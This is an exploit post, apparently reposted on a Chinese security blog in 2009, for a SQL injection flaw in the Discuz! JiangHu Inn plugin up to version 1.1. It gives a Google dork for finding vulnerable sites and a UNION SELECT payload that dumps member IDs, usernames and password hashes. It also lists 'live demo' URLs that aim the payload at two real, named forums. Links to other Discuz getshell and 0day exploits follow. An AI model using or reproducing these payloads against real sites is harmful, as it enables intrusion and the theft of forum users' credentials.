Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability[Discuz! 江湖客栈插件注入漏洞]

2009, September 27, 10:35 PM. 漏洞集研
Submitted by admin

Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
=========================================================
========================[Author]===========================                  

 [+] Founded  : ZhaoHuAn        
 [+] Contact : ZhengXing[at]shandagames[dot]com         
 [+] Blog : http://www.patching.net/zhaohuan/         
 [+] Date : Feb, 9th 2009 
 [+] Update : Sep, 1th 2009 
        
========================[Soft Info]======================  
        
Software: Discuz! Plugin JiangHu Inn          
Version : 1.1                     
Vendor : http://www.discuz.com
d0rk    : inurl:forummission.php                 

[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--


/---------------------------------------------www.zhaohuan.net-------------------------------------------------\ 

                                            Greetz : Snda Security Team
                                                    & Normal is boring - -!

\--------------------------------------------------------------------------------------------------------------/
{本文转自普瑞斯特博客-原文地址:http://www.hacksb.cn/post/84.html}

 

Tags: discuz

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Discuz!X2.5 Release 20120407 Getshell 0day (浏览: 22400, 评论: 0)
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 22260, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16868, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14416, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 45713, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50132, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23211, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15927, 评论: 0)
dz~~~~马后炮 (浏览: 10643, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11745, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):